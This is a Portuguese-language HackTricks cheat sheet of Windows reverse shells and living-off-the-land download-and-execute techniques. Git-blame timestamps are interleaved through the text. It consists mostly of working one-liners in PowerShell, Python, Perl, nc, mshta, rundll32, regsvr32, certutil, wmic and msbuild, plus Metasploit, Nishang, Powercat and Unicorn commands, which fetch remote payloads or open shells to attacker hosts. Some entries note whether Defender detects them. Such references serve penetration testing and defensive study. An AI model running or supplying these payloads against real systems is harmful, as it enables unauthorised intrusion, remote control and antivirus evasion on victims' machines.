2022-10-27 23:22:18 +00:00
# Shells - Windows
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 02:45:11 +00:00
< summary > < strong > Aprenda hacking AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 02:45:11 +00:00
Outras maneiras de apoiar o HackTricks:
2023-12-30 22:28:51 +00:00
2024-03-26 15:44:24 +00:00
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2024-02-05 02:45:11 +00:00
* Adquira o [**swag oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-06 04:06:53 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2024-02-05 02:45:11 +00:00
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2024-03-14 23:33:23 +00:00
**Grupo de Segurança Try Hard**
2024-03-26 15:44:24 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:33:23 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2022-10-27 23:22:18 +00:00
## Lolbas
2022-04-28 16:01:33 +00:00
2024-03-26 15:44:24 +00:00
A página [lolbas-project.github.io ](https://lolbas-project.github.io/ ) é para Windows assim como [https://gtfobins.github.io/ ](https://gtfobins.github.io/ ) é para linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows** , mas é útil saber **como** alguns **binários** podem ser (mal)usados para realizar algum tipo de ações inesperadas como **executar código arbitrário.**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## NC
2020-07-15 15:43:14 +00:00
```bash
nc.exe -e cmd.exe < Attacker_IP > < PORT >
```
2022-10-27 23:22:18 +00:00
## SBD
2020-07-15 15:43:14 +00:00
2024-03-26 15:44:24 +00:00
**[sbd](https://www.kali.org/tools/sbd/) é uma alternativa portátil e segura ao Netcat**. Funciona em sistemas semelhantes ao Unix e Win32. Com recursos como criptografia forte, execução de programas, portas de origem personalizáveis e reconexão contínua, o sbd oferece uma solução versátil para comunicação TCP/IP. Para usuários do Windows, a versão sbd.exe da distribuição Kali Linux pode ser usada como uma substituição confiável para o Netcat.
2024-02-07 05:33:07 +00:00
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444
2023-07-13 10:23:45 +00:00
2024-02-07 05:33:07 +00:00
# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
2023-07-13 10:23:45 +00:00
## Python
2020-07-15 15:43:14 +00:00
```bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__ (), __ctx.__exit__ (None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__ ': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__ ': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__ ('os', __g, __g))]][0] for __g['socket'] in [(__import__ ('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__ ('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__ ('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__ ('contextlib'))"
```
2023-12-30 22:28:51 +00:00
## Perl
2024-03-24 13:18:24 +00:00
2024-03-26 15:44:24 +00:00
Perl is a high-level, general-purpose programming language that is commonly used for scripting and system administration tasks. It is known for its powerful text processing capabilities and is often used for creating shell scripts on Windows systems. Perl scripts can be executed on Windows using the Perl interpreter, which needs to be installed on the system.
2020-07-15 15:43:14 +00:00
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while< >;'
```
2022-10-27 23:22:18 +00:00
## Ruby
2020-07-15 15:43:14 +00:00
```bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
2022-10-27 23:22:18 +00:00
## Lua
2020-07-15 15:43:14 +00:00
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
2022-10-27 23:22:18 +00:00
## OpenSSH
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Atacante (Kali)
2020-07-15 15:43:14 +00:00
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port > #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port2 > #Here yo will be able to get the response
```
2023-12-30 22:28:51 +00:00
Vítima
2020-07-15 15:43:14 +00:00
```bash
#Linux
openssl s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |/bin/bash|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
#Windows
openssl.exe s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |cmd.exe|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
```
2022-10-27 23:22:18 +00:00
## Powershell
2020-07-15 15:43:14 +00:00
```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
2021-03-18 23:05:52 +00:00
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
2020-07-15 15:43:14 +00:00
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
2023-06-06 18:56:34 +00:00
Processo realizando chamada de rede: **powershell.exe** \
2024-03-09 13:28:56 +00:00
Carga gravada no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando o procmon!_)
2020-07-15 15:43:14 +00:00
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
2024-02-05 02:45:11 +00:00
Processo realizando chamada de rede: **svchost.exe** \
Carga gravada no disco: **cache local do cliente WebDAV**
2024-03-26 15:44:24 +00:00
**Em uma linha:**
2020-07-15 15:43:14 +00:00
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>& 1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
2024-02-05 02:45:11 +00:00
**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**
2023-09-03 01:19:04 +00:00
2023-12-30 22:28:51 +00:00
## Mshta
2024-02-07 05:33:07 +00:00
* [A partir daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
2024-02-07 05:33:07 +00:00
2020-07-15 15:43:14 +00:00
```bash
mshta http://webserver/payload.hta
```
2024-02-07 05:33:07 +00:00
2020-07-15 15:43:14 +00:00
```bash
mshta \\webdavserver\folder\payload.hta
```
2024-02-07 05:33:07 +00:00
#### **Exemplo de shell reverso hta-psh (usar hta para baixar e executar backdoor PS)**
```xml
2023-07-13 10:23:45 +00:00
< scRipt language = "VBscRipT" > CreateObject ( "WscrIpt.SheLL" ) . Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')" < / scRipt >
2020-07-15 15:43:14 +00:00
```
2024-02-05 02:45:11 +00:00
**Você pode baixar e executar muito facilmente um zombie Koadic usando o stager hta**
2020-07-15 15:43:14 +00:00
2024-02-05 02:45:11 +00:00
#### Exemplo hta
[**Daqui** ](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f )
2024-02-07 05:33:07 +00:00
```xml
2020-07-15 15:43:14 +00:00
< html >
< head >
< HTA:APPLICATION ID = "HelloExample" >
< script language = "jscript" >
2023-07-13 10:23:45 +00:00
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
2020-07-15 15:43:14 +00:00
< / script >
< / head >
< body >
< script > self . close ( ) ; < / script >
< / body >
< / html >
```
2023-12-30 22:28:51 +00:00
#### **mshta - sct**
2024-02-05 02:45:11 +00:00
2024-03-26 15:44:24 +00:00
[**Daqui** ](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17 )
2024-02-07 05:33:07 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?XML version="1.0"?>
<!-- rundll32.exe javascript:" \.. \mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C: \local \path \scriptlet.sct"")")) -->
< script let >
< public >
< / public >
< script language = "JScript" >
< ![CDATA[
2023-07-13 10:23:45 +00:00
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
2020-07-15 15:43:14 +00:00
]]>
< / script >
< / scriptlet >
```
2023-12-30 22:28:51 +00:00
#### **Mshta - Metasploit**
2020-07-15 15:43:14 +00:00
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
```
```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
```
2023-06-06 18:56:34 +00:00
**Detectado pelo defensor**
2020-07-15 15:43:14 +00:00
2024-02-07 05:33:07 +00:00
2022-10-27 23:22:18 +00:00
## **Rundll32**
2020-07-15 15:43:14 +00:00
2024-03-26 15:44:24 +00:00
[**Exemplo de Dll hello world** ](https://github.com/carterjones/hello-world-dll )
2024-02-07 05:33:07 +00:00
* [Daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
2024-02-07 05:33:07 +00:00
2020-07-15 15:43:14 +00:00
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
2023-07-13 10:23:45 +00:00
**Detectado pelo defensor**
2020-07-15 15:43:14 +00:00
**Rundll32 - sct**
2024-02-05 02:45:11 +00:00
[**Daqui** ](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17 )
2024-02-07 05:33:07 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?XML version="1.0"?>
<!-- rundll32.exe javascript:" \.. \mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
< script let >
< public >
< / public >
< script language = "JScript" >
< ![CDATA[
2023-07-13 10:23:45 +00:00
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
2020-07-15 15:43:14 +00:00
]]>
< / script >
< / scriptlet >
```
2023-12-30 22:28:51 +00:00
#### **Rundll32 - Metasploit**
2023-07-13 10:23:45 +00:00
```bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
```
**Rundll32 - Koadic**
2020-07-15 15:43:14 +00:00
```bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
```
2022-10-27 23:22:18 +00:00
## Regsvr32
2024-02-07 05:33:07 +00:00
2024-03-24 13:18:24 +00:00
* [A partir daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
2024-02-07 05:33:07 +00:00
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
2024-02-05 02:45:11 +00:00
**Detectado pelo defensor**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
#### Regsvr32 -sct
2024-02-05 02:45:11 +00:00
[**Daqui** ](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1 )
2020-07-15 15:43:14 +00:00
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i: \\webdavserver \folder \regsvr32.sct scrobj.dll -->
< script let >
2023-07-13 10:23:45 +00:00
< registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
< script language = "JScript" >
< ![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
2020-07-15 15:43:14 +00:00
< / script >
< / registration >
< / scriptlet >
```
2023-12-30 22:28:51 +00:00
#### **Regsvr32 - Metasploit**
2020-07-15 15:43:14 +00:00
```bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
2024-03-14 23:33:23 +00:00
**Você pode baixar e executar facilmente um zombie Koadic usando o stager regsvr**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Certutil
2020-07-15 15:43:14 +00:00
2024-02-07 05:33:07 +00:00
* [Daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2024-02-05 02:45:11 +00:00
Baixe um B64dll, decodifique e execute.
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
2024-02-07 05:33:07 +00:00
Baixe um B64exe, decodifique e execute-o.
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
2024-02-05 02:45:11 +00:00
**Detectado pelo defensor**
2023-02-27 09:28:45 +00:00
2022-10-27 23:22:18 +00:00
## **Cscript/Wscript**
2020-07-15 15:43:14 +00:00
```bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
```
**Cscript - Metasploit**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
```
2023-06-06 18:56:34 +00:00
**Detectado pelo defensor**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## PS-Bat
2020-07-15 15:43:14 +00:00
```bash
\\webdavserver\folder\batchfile.bat
```
2023-06-06 18:56:34 +00:00
Processo realizando chamada de rede: **svchost.exe** \
2024-02-05 02:45:11 +00:00
Carga gravada no disco: **cache local do cliente WebDAV**
2020-07-15 15:43:14 +00:00
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
```
```bash
\\10.8.0.3\kali\shell.bat
```
2024-02-05 02:45:11 +00:00
**Detectado pelo defensor**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **MSIExec**
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Atacante
2022-10-27 23:22:18 +00:00
```
2020-11-11 00:39:24 +00:00
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
2020-07-15 15:43:14 +00:00
python -m SimpleHTTPServer 80
```
2023-06-06 18:56:34 +00:00
Vítima:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
2024-03-14 23:33:23 +00:00
**Detectado**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **Wmic**
2024-02-07 05:33:07 +00:00
* [A partir daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
```bash
2020-07-15 15:43:14 +00:00
wmic os get /format:"https://webserver/payload.xsl"
```
2024-03-09 13:28:56 +00:00
Exemplo de arquivo xsl [daqui ](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7 ):
2024-02-07 05:33:07 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version='1.0'?>
< style sheet xmlns = "http://www.w3.org/1999/XSL/Transform" xmlns:ms = "urn:schemas-microsoft-com:xslt" xmlns:user = "placeholder" version = "1.0" >
< output method = "text" / >
2023-07-13 10:23:45 +00:00
< ms:script implements-prefix = "user" language = "JScript" >
< ![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
< / ms:script >
2020-07-15 15:43:14 +00:00
< / stylesheet >
```
2023-06-06 18:56:34 +00:00
**Não detectado**
2020-07-15 15:43:14 +00:00
2023-12-30 22:28:51 +00:00
**Você pode baixar e executar muito facilmente um zumbi Koadic usando o stager wmic**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Msbuild
2024-02-07 05:33:07 +00:00
* [Daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
2024-03-24 12:25:47 +00:00
Pode usar esta técnica para contornar a Lista Branca de Aplicações e restrições do Powershell.exe. Como resultado, será solicitado um shell PS.\
Basta baixar e executar o seguinte: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj ](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj )
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
2023-06-06 18:56:34 +00:00
**Não detectado**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **CSC**
2020-07-15 15:43:14 +00:00
2024-02-05 02:45:11 +00:00
Compilar código C# na máquina da vítima.
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
2024-03-24 13:18:24 +00:00
Pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc ](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc )
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
**Não detectado**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **Regasm/Regsvc**
2024-02-07 05:33:07 +00:00
* [Daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
```bash
2020-07-15 15:43:14 +00:00
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
2024-02-05 02:45:11 +00:00
**Eu não tentei**
2020-07-15 15:43:14 +00:00
2020-12-24 11:57:24 +00:00
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182** ](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182 )
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Odbcconf
2024-02-07 05:33:07 +00:00
* [Daqui ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
```bash
2020-07-15 15:43:14 +00:00
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
2023-06-06 18:56:34 +00:00
**Eu não tentei**
2020-07-15 15:43:14 +00:00
2020-12-24 11:57:24 +00:00
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2** ](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2 )
2020-07-15 15:43:14 +00:00
2024-02-05 02:45:11 +00:00
## Shells do Powershell
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
### PS-Nishang
2020-07-15 15:43:14 +00:00
[https://github.com/samratashok/nishang ](https://github.com/samratashok/nishang )
2024-03-24 12:25:47 +00:00
Na pasta **Shells** , existem muitas shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e adicione ao final do arquivo:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
2024-02-05 02:45:11 +00:00
Comece a servir o script em um servidor web e execute-o no final da vítima:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
2024-03-26 15:44:24 +00:00
Defender ainda não o detecta como código malicioso (até 3/04/2019).
2020-07-15 15:43:14 +00:00
2024-03-09 13:28:56 +00:00
**TODO: Verificar outros shells do nishang**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
### **PS-Powercat**
2020-07-15 15:43:14 +00:00
2020-12-24 11:57:24 +00:00
[**https://github.com/besimorhino/powercat** ](https://github.com/besimorhino/powercat )
2020-07-15 15:43:14 +00:00
2024-03-09 13:28:56 +00:00
Baixe, inicie um servidor web, inicie o ouvinte e execute no final da vítima:
2022-10-27 23:22:18 +00:00
```
2023-07-13 10:23:45 +00:00
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
2020-07-15 15:43:14 +00:00
```
2024-03-24 12:25:47 +00:00
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
**Outras opções oferecidas pelo powercat:**
2020-07-15 15:43:14 +00:00
2024-03-26 15:44:24 +00:00
Conexão de shells, Shell reverso (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
Serve a cmd Shell:
2023-07-13 10:23:45 +00:00
powercat -l -p 443 -e cmd
2020-07-15 15:43:14 +00:00
Send a cmd Shell:
2023-07-13 10:23:45 +00:00
powercat -c 10.1.1.1 -p 443 -e cmd
2020-07-15 15:43:14 +00:00
Send a powershell:
2023-07-13 10:23:45 +00:00
powercat -c 10.1.1.1 -p 443 -ep
2020-07-15 15:43:14 +00:00
Send a powershell UDP:
2023-07-13 10:23:45 +00:00
powercat -c 10.1.1.1 -p 443 -ep -u
2020-07-15 15:43:14 +00:00
TCP Listener to TCP Client Relay:
2023-07-13 10:23:45 +00:00
powercat -l -p 8000 -r tcp:10.1.1.16:443
2020-07-15 15:43:14 +00:00
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
2023-07-13 10:23:45 +00:00
powercat -c 10.1.1.15 -p 443 -e cmd -g
2020-07-15 15:43:14 +00:00
Start A Persistent Server That Serves a File:
2023-07-13 10:23:45 +00:00
powercat -l -p 443 -i C:\inputfile -rep
2020-07-15 15:43:14 +00:00
```
2022-10-27 23:22:18 +00:00
### Empire
2020-07-15 15:43:14 +00:00
[https://github.com/EmpireProject/Empire ](https://github.com/EmpireProject/Empire )
2024-02-05 02:45:11 +00:00
Crie um iniciador powershell, salve-o em um arquivo e faça o download e execute-o.
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
2024-03-26 15:44:24 +00:00
**Detectado como código malicioso**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
### MSF-Unicorn
2020-07-15 15:43:14 +00:00
[https://github.com/trustedsec/unicorn ](https://github.com/trustedsec/unicorn )
2024-02-05 02:45:11 +00:00
Crie uma versão em powershell de uma backdoor do metasploit usando o unicorn
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
2023-06-06 18:56:34 +00:00
Inicie o msfconsole com o recurso criado:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
msfconsole -r unicorn.rc
```
2024-02-05 02:45:11 +00:00
Inicie um servidor web servindo o arquivo _powershell\_attack.txt_ e execute no alvo:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
2024-03-26 15:44:24 +00:00
**Detectado como código malicioso**
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
## Mais
2020-07-15 15:43:14 +00:00
2024-03-24 13:18:24 +00:00
[PS>Attack ](https://github.com/jaredhaight/PSAttack ) Console PS com alguns módulos ofensivos PS pré-carregados (cifrado)\
2022-10-27 23:22:18 +00:00
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9 ](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c )[\
2024-03-09 13:28:56 +00:00
WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos ofensivos PS e detecção de proxy (IEX)
2020-07-15 15:43:14 +00:00
2024-02-07 05:33:07 +00:00
## Referências
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
